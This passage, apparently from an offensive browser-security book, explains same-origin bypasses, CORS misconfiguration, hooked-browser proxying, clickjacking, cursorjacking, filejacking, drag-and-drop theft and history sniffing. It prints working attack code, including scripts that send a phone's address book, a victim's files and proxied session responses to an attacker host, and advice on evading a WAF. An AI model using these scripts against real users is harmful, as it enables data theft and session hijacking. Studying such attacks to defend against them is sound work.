local_xhr.open("GET", "file:///var/mobile/Library/AddressBook/" +
  "AddressBook.sqlitedb");
local_xhr.send();
local_xhr.onreadystatechange = function () {
  if (local_xhr.readyState == 4) {
    remote_xhr = new XMLHttpRequest();
    remote_xhr.onreadystatechange = function () {};
    remote_xhr.open("GET", "http://browserhacker.com/?f=" +
      encodeURI(local_xhr.responseText));
    remote_xhr.send();
  }
}
</script>
</body>
</html>

This attack demonstrates a few different exploitation methods available through the use of well-planted JavaScript. JavaScript is often run in a number of different environments and contexts, not just web browsers. In the instance of the iOS attack, the exploit ran inside a UIWebView object within the Dropbox or Google Drive application. A UIWebView object is often used as a form of embedded browser window within native iOS applications.

Another notable point about this attack is that it targeted mobile OSes, not traditional desktop environments. Due to the size constraints of the visible UI, these sorts of tasks may often occur without the target even being aware.

Bypassing SOP in CORS

While Cross-origin Resource Sharing (CORS) is a great way to relax the SOP, it’s easy to misconfigure without fully understanding the security impact of a relaxed policy. The following is an example of a potential misconfiguration:

Access-Control-Allow-Origin: *

In November 2012, Veracode performed research analyzing the HTTP headers from Alexa’s top one million sites.24 More than 2000 unique origins returned a wildcard value on the Access-Control-Allow-Origin header. This effectively allows any other site on the Internet to submit cross-origin requests to the sites and read the response. In practice, this means that the attacker has the equivalent of an SOP bypass for all these domains. Depending on the web application functionality, the results of this configuration could well be catastrophic. From a hooked browser on a different origin, these origins could be spidered and attacked in a much more reliable way than in a situation where the SOP is enforced.
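To illustrate the point, the following sketch (the target URL is invented) is all that JavaScript running in any hooked origin needs in order to read a response from a site returning the wildcard header. Note that browsers refuse to combine the wildcard with Access-Control-Allow-Credentials, so only content that doesn’t require the victim’s cookies is exposed this way:

// Cross-origin read against a site that returns
// Access-Control-Allow-Origin: * on its responses.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://misconfigured.example/api/data', true);
xhr.onreadystatechange = function () {
  if (xhr.readyState === 4 && xhr.status === 200) {
    // Normally the SOP would block this read; the wildcard header permits it.
    console.log(xhr.responseText);
  }
};
xhr.send();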

Obviously, there might be cases where a wildcard value for the Access-Control-Allow-Origin header isn’t insecure, for instance when a permissive policy is only used to provide content that doesn’t contain sensitive information.

When analyzing an application that sets CORS headers, it’s always important that you understand the relation between the allowed origins. This is even the case if a wildcard value is not used. Multiple origins might be allowed to connect to the same target. So a standard XSS vulnerability on those allowed origins might be enough for you to abuse the target functionality cross-origin.

All these SOP bypass examples are provided as conceptual illustrations; they are by no means an exhaustive list. Other vectors could be described here, and certainly many others are still to be made public. We encourage you to think about the relationship between the different varieties, and about the shared aspects they leverage. SOP bypasses relying on 301 or 302 redirects, together with schemes such as file, will almost certainly be common in new SOP enforcement bugs discovered in the future.

Exploiting SOP Bypasses

Now that you have a good understanding of the SOP and multiple examples of SOP bypasses, it’s time to take a look at some practical attacks.

You will learn how it’s possible to use some of the SOP bypasses presented in the previous pages to employ the hooked browser as an HTTP proxy. This can even be done in the face of numerous web application security controls such as defensive cookie flags and concurrent session prevention.

Multiple UI redressing attacks will also be presented in this section. Some of these rely on SOP bypasses and others simply work because the SOP wasn’t initially designed to address such issues.

Proxying Requests

Once you have control over an origin, more sophisticated attacks can be useful. By leveraging the hooked browser to make requests on your behalf, you can effectively proxy requests through the hooked browser and use it to browse other origins. This comes with a number of benefits including browsing with the cookies (authentication tokens) of the hooked user, which allows for a wide range of additional access. Of course, proxying requests can also be very valuable to you even without an SOP bypass.

Anton Rager released the first public research paper on leveraging XSS vulnerabilities to create an HTTP Proxy.25 Petko Petkov then expanded on Rager’s work to create BackFrame. Stefano di Paola and Giorgio Fedon then extended this research further in a paper on “Subverting AJAX”26 in 2006. The two researchers presented various ways to subvert AJAX by leveraging prototype overriding, HTTP Response Splitting and other techniques.

Other research to use a hooked browser to act as an HTTP proxy came from Ferruh Mavituna with the release of XSS Tunnel27 in 2007. This concept was subsequently implemented into BeEF to become the Tunneling Proxy. Since then, BeEF’s Tunneling Proxy has been extended to support exploiting other SOP bypasses. The concept behind the idea of proxying requests through XSS is as follows:

1. A server socket listens on the attacker machine (the proxy back end). It parses incoming HTTP requests, and translates them into AJAX requests, ready to be injected as additional JavaScript code within the hooked browser.

2. These JavaScript snippets are then sent to the hooked browser through one of the communication channels explored in Chapter 3.

3. When the hooked browser executes this additional code, the corresponding AJAX request is issued and the HTTP response is sent back to the proxy back end.

4. The proxy back end strips and adjusts various headers (such as Content-Encoding: gzip, Content-Length and others) and sends the response back to the client socket that originally sent the HTTP request to the proxy.

These four steps have been reproduced in Figure 4-7, which displays how tunneling requests through the hooked browser works.

Figure 4-7: Tunneling Proxy high-level architecture

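A heavily simplified sketch of the browser-side half of this loop follows. It is not BeEF’s actual implementation: the polling endpoints and the JSON job format are invented for illustration, and the attacker’s server is assumed to return permissive CORS headers so the hooked origin can read the control channel:

// Hypothetical polling loop running in the hooked browser.
// /proxy/next returns a job such as {"id":1,"method":"GET","url":"/account","body":null};
// /proxy/result receives the raw response body for that job id.
function poll() {
  var ctrl = new XMLHttpRequest();
  ctrl.open('GET', 'http://browserhacker.com/proxy/next', true);
  ctrl.onreadystatechange = function () {
    if (ctrl.readyState !== 4) return;
    if (ctrl.status === 200 && ctrl.responseText) {
      var job = JSON.parse(ctrl.responseText);
      var req = new XMLHttpRequest();
      // Limited to the hooked origin unless an SOP bypass is available
      req.open(job.method, job.url, true);
      req.onreadystatechange = function () {
        if (req.readyState !== 4) return;
        var out = new XMLHttpRequest();
        out.open('POST', 'http://browserhacker.com/proxy/result?id=' + job.id, true);
        out.send(req.responseText); // the victim's cookies were sent automatically with req
      };
      req.send(job.body);
    }
    setTimeout(poll, 1000); // keep polling for the next tunneled request
  };
  ctrl.send();
}
poll();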

When tunneling requests, by default you are limited to the same-origin as the hooked site due to the SOP. For instance, if you hooked a user at browservictim.com you would only be able to request additional pages within that origin. This is because the SOP is preventing you from going outside of that origin.

With an SOP bypass, however, you would be able to proxy requests outside of that origin. This would allow you to request arbitrary pages with the authorization (cookie session tokens) of the hooked browser.

Consider a scenario (without an SOP bypass) where you want to target a public-facing web application. A Web Application Firewall (WAF) may be present, configured to aggressively block the attacking source IP after a threshold of five malicious requests. You just found a DOM-based XSS, which can’t be mitigated by a classic WAF, and you are able to hook an internal network user of the same company. More than likely, the WAF has the company gateway address and network range white-listed on its rule sets, because the perceived probability of an attack coming from the internal network is minimal.

You can now use the Tunneling Proxy to check for more bugs on the web application. The requests are tunneled through the hooked browser sitting in the internal network, so they shouldn’t generate too much noise on the WAF. Ideally, they will be completely ignored by the WAF because they come from the internal network. As explored in the “Proxying through the Browser” section of Chapter 9, you can even use Burp and sqlmap through the Tunneling Proxy.

Another reason you may want to use the Tunneling Proxy within the same-origin is if the origin surface requires authentication. Imagine you have an XSS post-authentication, and you’re able to hook a browser with that vulnerability. Using the Tunneling Proxy, you can now easily browse the authenticated surface of the application, effectively riding the hooked target’s session. You don’t even need to steal cookies. Importantly, the HttpOnly security control is not effective in this case, because it’s the target’s browser itself that is requesting resources for you.

If instead you use the Tunneling Proxy combined with an SOP bypass, you effectively have an open HTTP proxy in your hands. This is because the vulnerable hooked browser can send cross-origin requests and read responses from every origin. In fact, if you have multiple hooked browsers, all affected by the same SOP bypass, you will have multiple proxies. You can switch between proxies depending on the hooked browser network bandwidth, or target the same-origin from multiple hooked browsers to deliver the attack from multiple locations.

Exploiting UI Redressing Attacks

UI redressing attacks have become prominent in browser and application security scenarios. Due to the growth of social networks, the viral and omnipresent advertisements and “Like” buttons, this type of attack has started to be exploited in the wild.28

The most well-known type of UI redressing attack is Clickjacking. Obviously, there are various other attacks that can be classified as UI redressing. They differ based on the kind of action you can take and the information you can retrieve. Some of these are analyzed in the next sections, together with a few historic attacks that relied on drag&drop actions.

Using Clickjacking

Clickjacking attacks rely on using independently positioned transparent IFrames and special CSS selectors to fool the user into clicking on an invisible element. This attack was first discussed in 2002 by Jesse Ruderman29 and was then later named Clickjacking by Robert Hansen and Jeremiah Grossman in 2008. Consider the following example, where a page that contains administrative functionality is embedded in another page through an IFrame:

<html>
<head>
</head>
<body>
<form name="addUserToAdmins"
  action="javascript:alert('clicked on hidden IFrame. User added.')"
  method="POST">
<input type="hidden" name="userId" value="1234">
<input type="hidden" name="isAdmin" value="true">
<input type="hidden" name="token"
  value="asasdasd86asd876as87623234aksjdhjkashd">
<input type="submit" value="Add to admin group"
  style="height: 60px; width: 150px; font-size:3em">
</form>
</body>
</html>

You can see the page also uses anti-XSRF tokens to prevent Cross-site Request Forgery attacks. For the sake of the demonstration, the action attribute of the HTML form contains JavaScript that displays an Alert box. A real page would contain a proper URL where those input values are sent. When the user clicks the Submit button, the user with ID 1234 is added to the administrative group. To launch the attack, the previous page is framed in the following page:

<html>
<head>
<style>
iframe{
  filter:alpha(opacity=0);
  opacity:0;
  position:absolute;
  top: 250px;
  left: 40px;
  height: 300px;
  width: 250px;
}
img{
  position:absolute;
  top: 0px;
  left: 0px;
  height: 300px;
  width: 250px;
}
</style>
</head>
<body>
<!-- The user sees the following image -->
<img src="http://localhost/clickjacking/yes-no_mod.jpg">
<!-- but he effectively clicks on the following framed content -->
<iframe src="http://localhost/clickjacking/iframe_content.html"></iframe>
</body>
</html>

The result is shown in Figure 4-8. Note that there is no visible trace of the framed content. This undetectable content is the basis of many UI redressing attacks, as it is what your target actually interacts with.

Figure 4-8: An apparently innocuous poll page with two buttons


If you comment out the first two lines of the IFrame CSS definition in the previous code snippet, the opacity will be removed and you can see how the IFrame is positioned, as shown in Figure 4-9. The top and left CSS attributes are used to place the IFrame on top of the image buttons.

Figure 4-9: Removing the IFrame opacity reveals the real positioning.


When the user clicks either YES or NO, what is really clicked is the HTML form’s submit button loaded in the IFrame, as you can see in Figure 4-10.

Figure 4-10: Clicking on the hidden IFrame submit button


This is a very simple example of how a user can be fooled into performing unwanted actions. The concept behind this attack could be used for a number of purposes, for example elevating the privileges of a normal user. The victim of such an attack could be a user that has administrator privileges. They could be already logged in to an application with functionality similar to the code snippet presented earlier.

The fact the application relies on an anti-XSRF token doesn’t impact the delivery of the Clickjacking attack. This is because the resource to be framed is loaded normally and contains a valid anti-XSRF token. Clickjacking is in fact an ideal attack method you can perform against an application that uses anti-XSRF tokens, effectively nullifying the protection offered by those tokens.

Chapter 3 discusses how to prevent loading resources in IFrames. The same caveats presented in that chapter can be applied here. A way to generally prevent UI redressing attacks (as almost every attack relies on loading a resource into an IFrame) is by using the header X-Frame-Options: DENY. As you will learn in the next sections, there have been cases where simple frame-busting code was not enough to prevent some attacks.
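For completeness, a minimal defensive sketch follows (a generic Node.js example of ours, not code from the book). The response header is the robust control; the in-page frame-busting script is the legacy fallback and, as noted above, it can be defeated in several ways:

// Serve a page that refuses to be framed.
var http = require('http');
http.createServer(function (req, res) {
  res.setHeader('X-Frame-Options', 'DENY'); // browsers that honor it will not frame the page
  res.setHeader('Content-Type', 'text/html');
  res.end(
    '<html><body>' +
    // legacy frame-busting fallback for browsers that ignore the header
    '<script>if (top !== self) { top.location = self.location; }</script>' +
    'Sensitive administrative functionality' +
    '</body></html>');
}).listen(8080);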

Clickjacking the Flash Settings Manager

Robert Hansen and Jeremiah Grossman contributed greatly to the public awareness of Clickjacking attacks. In 2008, they were able to mount a Clickjacking attack on the Flash Settings Manager.30

Using transparent (opacity=0) IFrames and divs, they successfully hid the Flash Settings Manager “Allow” button on top of apparently innocuous page elements. The target, while seemingly clicking an innocuous button, would actually be clicking on the Flash Settings widget, as shown in Figure 4-11.

Figure 4-11: The opaque IFrames and divs cover the Flash widget text.


The impact of such an action is clearly visible here, resulting in the compromise of the target’s privacy. Note that the text displayed in the Flash Settings Manager isn’t visible either, leaving the target completely unaware of what is happening and where they are clicking.

The previous Clickjacking examples have demonstrated what is possible with CSS alone. If you need the attack to take dynamic information from the target, for instance mouse movements, you can throw JavaScript into the mix. The flexibility of JavaScript enables you to determine the exact x and y coordinates of the current mouse position. This comes in handy when mounting complex Clickjacking attacks that rely on multiple clicks being performed.

Imagine you framed a page with a button that required a user click in order to execute your attack. In this instance, your Clickjacking aim is to ensure your target’s mouse is always on top of that button. In this way, as soon as they click anywhere, the user is effectively clicking exactly where you want. Rich Lundeen and Brendan Coles created a BeEF command module implementing this very technique.31

In this scenario you have two frames, an inner and an outer IFrame. The outer IFrame loads the target origin you want to exploit with the Clickjacking attack. The inner IFrame instead listens to onmousemove events, and its position gets updated according to the current mouse cursor position. In this way, the mouse cursor is always over what you want the target to click on.

The following code uses the jQuery API to dynamically update the position of outerObj given the current mouse coordinates:

$j("body").mousemove(function(e) {

$j(outerObj).css('top', e.pageY);

$j(outerObj).css('left', e.pageX);

});

The inner IFrame style uses the opacity trick to render an invisible element:

filter:alpha(opacity=0);
opacity:0;

Consider the following sample page, which is the target of the Clickjacking attack. You want the user to click the Add User button, which in this case simply creates a pop-up when clicked. Note the body background color that has been added to better illustrate the following example:

<html>
<head>
</head>
<body style="background-color:red">
<p> </p>
<button onclick="javascript:alert('User Added')"
 type="button">Add User to Admin group</button>
<p> </p>
</body>
</html>

If you launch the “Clickjacking” BeEF module with the preceding HTML as the inner IFrame, then all the clicks will be sent to the IFrame. The results of this can be seen in Figure 4-12 and Figure 4-13. As you can see, the IFrame is following the mouse movements, so that wherever the user clicks on the page, they will actually be clicking the Add User button.

Figure 4-12: The IFrame is reliably following the mouse movements.


Figure 4-13: The cursor is still on top of the button.


When the user decides to click somewhere, the click will trigger the onClick event of the button in the framed page. As you have seen in the source of the framed page, this will result in an Alert dialog, as shown in Figure 4-14.

Figure 4-14: Successful Clickjacking


Note that in the previous figures, you can see the background and the button under the mouse cursor. This is because, for the sake of the demonstration, the opacity has not been set to hide the IFrame’s content.

Using Cursorjacking

This section explores attacks similar to Clickjacking; this time, however, the focus is on the mouse cursor. Cursorjacking comes in handy when you need to mount complex UI redressing attacks.

NoScript ClearClick

NoScript is one of the more popular Firefox extensions designed to help prevent XSS, XSRF, and various UI redressing attacks. Its ClearClick32 functionality helps with identifying and preventing Clickjacking attacks by taking a screenshot of the framed page and the parent page, as you would normally see it. If the two screenshots are different, then a Clickjacking attack is identified. Using this technique, NoScript is able to identify clicks on page elements that are transparent and which are potentially being used to deliver Clickjacking attacks.

The first examples of Cursorjacking were demonstrated by Eddy Bordi, and then refined by Marcus Niemietz.33 Cursorjacking deceives users by means of a custom cursor image, where the pointer is displayed with an offset. The displayed cursor is shifted to the right from the actual mouse position. An attacker can then direct user clicks to desired and well-positioned elements. Consider the following page:

<html>
<head>
<style type="text/css">
#c {
  cursor:url("http://localhost/basic_cursorjacking/new_cursor.png"),default;
}
#c input {
  cursor:url("http://localhost/basic_cursorjacking/new_cursor.png"),default;
}
</style>
</head>
<body>
<h1> CursorJacking. Click on the 'Second' or 'Fourth' buttons. </h1>
<div id="c">
<input type="button" value="First" onclick="alert('clicked on 1')">
<input type="button" value="Second" onclick="alert('clicked on 2')">
<br></br>
<input type="button" value="Third" onclick="alert('clicked on 3')">
<input type="button" value="Fourth" onclick="alert('clicked on 4')">
</div>
</body>
</html>

From the CSS definition, you can see the mouse cursor is changed with a custom image. The image, as you can see in Figure 4-15, contains a mouse icon that is moved to a static offset on the right.

Figure 4-15: Clicking the Second button results in clicking the First button.


For demonstrative purposes, the image background is visible. In a real attack, the image would still be a PNG but with a transparent background. When the target tries to click the Second or Fourth buttons in the page, they will actually be clicking the buttons on the left of the page. The real positioning of the mouse cursor is hidden using the new cursor image.

Krzysztof Kotowicz34 and Mario Heiderich extended these Cursorjacking techniques. Their new attack vector relied on completely hiding the real cursor by adding the following style to the body element:

<body style="cursor:none">

A different cursor image is then dynamically overlaid and is associated with mousemove events. The following code demonstrates this technique:

<html>
<head><title>Advanced cursorjacking by Kotowicz & Heiderich</title>
<style>
body,html {margin:0;padding:0}
</style>
</head>
<body style="cursor:none;height: 1000px;">
<img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" />
<div style="margin-left:300px;">
<h1>Is this a good example of cursorjacking?</h1>
</div>
<button style="font-size:150%;position:absolute;
 top:130px;left:630px;">YES</button>
<button style="font-size:150%;position:absolute;
 top:130px;left:680px;">NO</button>
<div style="opacity:1;position:absolute;top:130px;left:30px;">
<a href="https://twitter.com/share" class="twitter-share-button"
 data-via="kkotowicz" data-size="small">Tweet</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];
if(!d.getElementById(id)){js=d.createElement(s);js.id=id;
js.src="//platform.twitter.com/widgets.js";
fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
</div>
<script>
function shake(n) {
  if (parent.moveBy) {
    for (var i = 10; i > 0; i--) {
      for (var j = n; j > 0; j--) {
        parent.moveBy(0,i);
        parent.moveBy(i,0);
        parent.moveBy(0,-i);
        parent.moveBy(-i,0);
      }
    }
  }
}
shake(5);

var oNode = document.getElementById('cursor');
var onmove = function (e) {
  var nMoveX = e.clientX, nMoveY = e.clientY;
  oNode.style.left = (nMoveX + 600) + "px";
  oNode.style.top = nMoveY + "px";
};
document.body.addEventListener('mousemove', onmove, true);
</script>
</body>
</html>

First, the real mouse cursor is hidden and a custom cursor image is displayed in its place. Second, an event listener is attached to the page body, listening for mousemove events. When the real mouse is moved, the events trigger the listener, which moves the fake (visible) cursor accordingly.

With JavaScript, the real cursor movements are followed (on both the x and y coordinates), and the position of the fake cursor is updated. As you may realize, the same technique was used in the previous section on advanced Clickjacking. The results can be seen in Figure 4-16: when the target clicks the YES button, they're actually clicking the Twitter button.

Figure 4-16: Clicking the YES button results in clicking the Twitter button.


This new Cursorjacking technique originally bypassed NoScript's ClearClick protection. Recall the protection offered by ClearClick discussed earlier: its ability to identify whether a click lands on a transparent (opacity:0) element. In the previous example, the real click lands on a fully visible region of the page (the Twitter button), so NoScript couldn't detect the attack. This ClearClick bypass was addressed in NoScript version 2.2.8 RC1.35

Using Filejacking

Filejacking allows the extrusion of directory contents from the target’s underlying OS to the attacker’s server through clever UI manipulation within the browser. The result is that under certain conditions, you can download files from the target’s machine. The two prerequisites to successfully perform this attack are:

1. The target must use Chrome, because it’s currently the only browser that supports directory and webkitdirectory input attributes like the following:

<input type="file" id="file_x" webkitdirectory directory />

2. The attack relies on baiting the target into clicking somewhere, similar to other UI redressing techniques. In this case, a transparent input element is overlaid on a visible button element, using the common opacity CSS trick you've seen in the previous pages.

Kotowicz36 first published this UI redressing research in 2011 after analyzing the impact of delivering Filejacking attacks to users baited with social engineering tricks.

The Filejacking attack relies on the target using the operating system's "Choose Folder" dialog box when downloading a file from the web. To optimize the attack, you should attempt to trick the user into selecting a directory containing sensitive files, for instance by employing authentic-looking phishing content. Figure 4-17 demonstrates what the target will see when they click the "Download to…" button. JavaScript then enumerates the files in the selected directory through the directory input attribute, and POSTs each file back to your server.

Figure 4-17: Clicking “Download to…” opens the Choose Folder dialog.


Consider the following server-side Ruby code:

require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'

class UploadManager < Sinatra::Base
  post "/" do
    puts "receiving post data"
    params.each do |key,value|
      puts "#{key}->#{value}"
    end
  end
end

@routes = {
  "/upload" => UploadManager.new
}
@rack_app = Rack::URLMap.new(@routes)
@thin = Thin::Server.new("browserhacker.com", 4000, @rack_app)
Thin::Logging.silent = true
Thin::Logging.debug = false
puts "[#{Time.now}] Thin ready"
@thin.start

The code binds Thin, a Ruby web server, to port 4000, ready to process HTTP POST requests to the /upload URI. When a POST request arrives at that URI, its contents are printed to the console, as you can see in Figure 4-18.

The following JavaScript code is the client-side part of the attack. Note that the cloaked input element has its opacity set to 0 and is positioned over the visible cloak button. When the target clicks what appears to be the button, they are actually clicking the input element, thinking they need to select a download destination, as you have seen in Figure 4-17.

As soon as the target clicks the input element, a download destination is chosen. The onchange event on the input element is then triggered and the corresponding anonymous function is executed. This results in enumerating the files contained in the selected download destination and formatting their content using the FormData object. Finally, they are extruded with a cross-origin POST XMLHttpRequest. That is, the contents of the chosen directory are enumerated and every file is uploaded to your server:

<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"
 type="text/javascript"></script>
<style>
body {background: #333; color: #eee;}
a:link, a:visited {color: lightgreen;}
input[type='file'] {
  opacity: 0;
  position: absolute;
  left: 0; top: 0;
  width: 300px;
  line-height: 20px;
  height: 25px;
}
#cloak {
  position: absolute;
  left: 0;
  top: 0;
  line-height: 20px;
  height: 25px;
  cursor: pointer;
}
label {
  display: block;
}
</style>
</head>
<body>
<button id=cloak>Download to...</button>
<input type="file" id="cloaked" webkitdirectory directory />
<script>
document.getElementById("cloaked").onchange = function(e) {
  for (var i = 0, f; f = e.target.files[i]; ++i) {
    console.log("sending file with path: " +
        f.webkitRelativePath + ", name: " + f.name);
    var fdata = new FormData();
    fdata.append('path', f.webkitRelativePath);
    fdata.append('name', f.name);
    fdata.append('content', f);
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://browserhacker.com/upload", true);
    xhr.send(fdata);
  }
};
</script>
</body>
</html>

Note that the origins of the two previous snippets are different, but this doesn't prevent the attack from working. The files can still be extruded from the target's operating system, without violating the SOP, on Gecko- and WebKit-powered browsers such as Firefox, Chrome and Safari. In cross-origin scenarios, these browsers still send the XMLHttpRequest even though the response cannot be read, whereas other browsers such as Opera do not. You will explore how this behavior is significant with many types of new attacks in Chapters 9 and 10.

Figure 4-18: The POST data is sent cross-origin.


Using Drag and Drop

Another example of how inconsistent SOP implementations can result in vulnerabilities is the drag&drop UI redressing attack. Exploiting these holes in the target browser will result in stealing content across different origins. One of the first public disclosures of such an attack was from Michal Zalewski in late 2010.37 He reported a bug in Firefox (patched in 2012) where the SOP was not enforced when performing cross-origin drag&drop actions.

You could create an IFrame in a phishing page you control. The IFrame source points to a cross-origin resource, whose content can be read, bypassing the SOP, if the user drags content from the IFrame and drops it somewhere in the top-level window.

This behavior can be achieved by tricking the target into performing drag&drop actions on elements in the page, for example by presenting a basic game. The element that is dragged and dropped is the IFrame containing the content you want to read.

The first PoC applying this technique used resources framed with the view-source: scheme. For example:

<iframe src="view-source:http://browservictim.com/any">

If a resource is loaded with view-source, the raw HTML source is rendered. There are numerous advantages to tricking the user into performing a drag&drop action of this framed content into the top-level window. These include the ability to read anti-XSRF tokens and any other information you can get reading the raw HTML of the page.
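To illustrate the idea, a minimal sketch of the attacker-controlled drop target might look like the following. The element ID and the collection URL are hypothetical, and the cross-origin read only succeeded on browser builds affected by the bug described here; this is not the original PoC.

<div id="dropzone" style="width:300px;height:300px;border:1px dashed #999;">
Drop the puzzle piece here to continue the game
</div>
<script>
var zone = document.getElementById('dropzone');
// Allow content to be dropped onto the element.
zone.addEventListener('dragover', function (e) { e.preventDefault(); });
zone.addEventListener('drop', function (e) {
  e.preventDefault();
  // On vulnerable builds, the selection dragged out of the view-source
  // frame could be read here as plain text (the raw HTML of the page).
  var stolen = e.dataTransfer.getData('text/plain');
  // Send the captured markup (anti-XSRF tokens included) to your server.
  new Image().src = 'http://browserhacker.com/collect?d=' +
      encodeURIComponent(stolen);
});
</script>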

This bug was patched in Firefox in late 2011, disallowing cross-origin drag&drop actions. Kotowicz found another interesting way around this limitation, which still worked in Firefox at the time of this writing. The technique, called "Fake Captcha",38 covers a specific corner case: a resource is framed using view-source as discussed before, and the content you want to retrieve is positioned at a specific offset in the top-level window. The technique exploits the fact that a user, when presented with an input field containing some content to be copied, may rely on a mouse triple-click followed by Ctrl+C. This action selects and copies the whole line to the clipboard. In this case, the content displayed in the input field is a fragment of a line of raw HTML from the framed content. Figure 4-19 shows what the user sees, and Figure 4-20 illustrates what's really happening in the background.

Figure 4-19: Source visible to the user.


If the user triple-clicks the Security Code input field, the whole line is effectively selected and then copied with Ctrl+C, as you can see in Figure 4-20. The highlighted content is only a piece of the line, the section you want the unsuspecting user to see. The technique relies on positioning the IFrame at a specific offset on the top-level window. The Security Code input field is not a real input field, but an IFrame, as you can see from the following code:

<style>
iframe#one {
  margin: 0;
  padding: 0;
  width: 9em;
  height: 1em;
  border: 2px inset black;
  font: normal 13px/14px monospace;
  display: inline-block;
}
</style>
<p>
<label>Security code:</label><iframe id=one scrolling=no
 src="http://browservictim.com/any"></iframe>
</p>

Figure 4-20: Enlarging the IFrame shows more detail


When the target pastes the content into the second input field, the whole line is pasted and its full content is revealed to you. In this example (as you can see in Figure 4-21) an anti-XSRF token is retrieved, which can be used for future attacks against the framed origin.

Figure 4-21: The whole line pasted by the user is an anti-XSRF token.


This technique allows cross-origin content extraction, effectively bypassing the SOP. It is also worthwhile noting that in October 2011 this technique was exploited in the wild against Facebook.39

Another cross-origin content extraction method is the IFrame-to-IFrame drag&drop technique by Luca De Fulgentis.40 The technique is very similar to the previous drag&drop/view-source PoC. The main difference is that the victim drags content from the target IFrame onto another IFrame, rather than onto the top-level window.

In this attack, you control the drag&drop destination IFrame. When content is dropped into your IFrame, Firefox submits the information back to you, even cross-origin. This occurs because no checks on cross-origin drag&drop actions between IFrames were implemented in the codebase. In his original disclosure, De Fulgentis demonstrated how to target LinkedIn users by stealing anti-XSRF tokens, and then subsequently adding arbitrary e-mail addresses to a target’s profile.

De Fulgentis’ technique serves as another clear example of a lack of SOP enforcement on drag&drop actions.

Exploiting Browser History

Browser history attacks reveal information about other origins. They give you a way of determining what origins the browser (and of course, the user) has been visiting.

In the past, an effective form of browser history attack involved simply checking the color of links written to the page. You will briefly explore this CSS color technique; however, keep in mind that modern browsers have now been patched against this form of attack.

You will also check out attacks involving timing. These attack methods are currently the most effective for revealing browser history information across a range of browsers.

Other corner cases exist that rely on specific APIs being exposed by the browser itself. A few lesser-known browsers vulnerable to these history-stealing attacks, such as Avant and Maxthon, will also be explored.

Using CSS Colors

In the ‘good old days’, it was possible to steal browser history using CSS information. This was primarily performed through the abuse of the visited CSS selector. The following technique (discussed on Full Disclosure41 in 2002) was very simple but very effective. Consider the following link:

<a id="site_1" href="http://browservictim.com">link</a>

The :visited CSS pseudo-class could then be used to check whether the target had visited the previous link, and therefore whether it was present in the browser history:

#site_1:visited {
  background: url(/browserhacker.com?site=browservictim);
}

In this case, the background property is used, but you can use any property in which a URI can be specified. If browservictim.com is present in the browser's history, a GET request to browserhacker.com?site=browservictim will be submitted.

Jeremiah Grossman disclosed a similar technique in 2006 that relied on checking the color of a link element. In most browsers, the default behavior was to set the text color of an already visited link to violet, and the text color of an unvisited link to blue. In Grossman's original Proof of Concept,42 the visited style was overridden with a custom style (for example, a red color). A script was then used to dynamically generate links on the page, potentially hidden from the user, and the computed color of each link was compared with the overridden red style. If they matched, you would know that the site was present in the browser history. Consider the following example:

<html>
<head>
<style>
#link:visited {color: #FF0000;}
</style>
</head>
<body>
<a id="link" href="http://browserhacker.com" target="_blank">clickme</a>
<script>
var link = document.getElementById("link");
var color = document.defaultView.getComputedStyle(link, null)
    .getPropertyValue("color");
console.log(color);
</script>
</body>
</html>

If the link was previously visited, and the browser is vulnerable to this attack, the output in the console log would be rgb(255, 0, 0), which corresponds to the red color overridden in the CSS. If you run this snippet in the latest Firefox (which is patched against this attack), it will always return rgb(0, 0, 238).

Nowadays, most modern browsers have patched this behavior. For example, Firefox patched this technique in 2010.43

Using Cache Timing

Felten and Schneider44 produced one of the first public research papers on the topic of cache timing attacks in 2000. The paper, titled "Timing Attacks on Web Privacy," was mainly focused on measuring the time required to access a resource with and without browser caching. Using this information, it was possible to deduce whether the resource had already been retrieved (and cached). One of the limits of this approach was that querying the browser cache during the initial test also tainted it.
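A crude sketch of that destructive approach follows. It simply times how long a cross-origin resource takes to load and compares the result against a threshold; the URL and the 50-millisecond threshold are illustrative assumptions, and note that running the test fetches the resource, tainting the cache exactly as described above.

// Naive (destructive) cache-timing check: a fast load suggests the
// resource was already cached, a slow one that it came from the network.
// Either way, the resource ends up cached afterwards, tainting the test.
function naiveCacheCheck(url, thresholdMs, callback) {
  var img = new Image();
  var start = new Date().getTime();
  img.onload = img.onerror = function () {
    var elapsed = new Date().getTime() - start;
    callback(elapsed < thresholdMs);
  };
  img.src = url;
}

// Example: was this (hypothetical) resource already in the cache?
naiveCacheCheck('http://browservictim.com/logo.png', 50, function (cached) {
  console.log(cached ? 'probably visited' : 'probably not visited');
});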

Michal Zalewski explored45 a non-destructive technique to extract browser history using a similar cache-timing approach. At the time of this writing, this technique works on modern browsers.

Zalewski's approach consists of loading resources in IFrames, trapping SOP violations and avoiding any alteration of the cache. IFrames are ideal for this purpose because the SOP is enforced on them, and you can stop an IFrame before it fully loads the resource, leaving the local cache unmodified. The cache stays unaltered thanks to the short timings used when loading and unloading resources: as soon as a cache miss on a particular resource can be ascertained, the IFrame load is stopped. This allows the same resource to be tested again at a later stage.

The most effective resources to target using this technique are CSS or JavaScript files, because they are often cached by the browser, and are always loaded when browsing to a target website. One issue to be mindful of is that these resources will be loaded in IFrames, and as such must not be protected by frame-busting logic or a restrictive X-Frame-Options header (such as DENY or SAMEORIGIN).

The output of this attack is demonstrated in Figure 4-22. In this instance it was determined that the user had browsed to AboveTopSecret.com and Wikileaks.org.

Figure 4-22: Browser history retrieval using cache timing


The two resources that are typically loaded when browsing to those websites are:

http://wikileaks.org/squelettes/random.js

http://www.abovetopsecret.com/forum/ats-scripts.js

The core of the technique is the following code snippet:

function wait_for_noread() {
  try {
    /*
     * This is where the SOP violation happens, because we're trying
     * to read the location.href property of a cross-origin resource
     * loaded into an IFrame.
     */
    if (frames['f'].location.href == undefined) throw 1;

    /*
     * Until TIME_LIMIT is reached, continuously try to read
     * location.href from the IFrame. Otherwise call maybe_test_next(),
     * which resets the IFrame src to about:blank, preventing the full
     * resource load and any cache alteration, and then proceeds with
     * the next resource.
     */
    if (cycles++ >= TIME_LIMIT) {
      maybe_test_next();
      return;
    }
    setTimeout(wait_for_noread, 1);
  } catch (e) {
    /*
     * The SOP violation is trapped, confirming that the checked
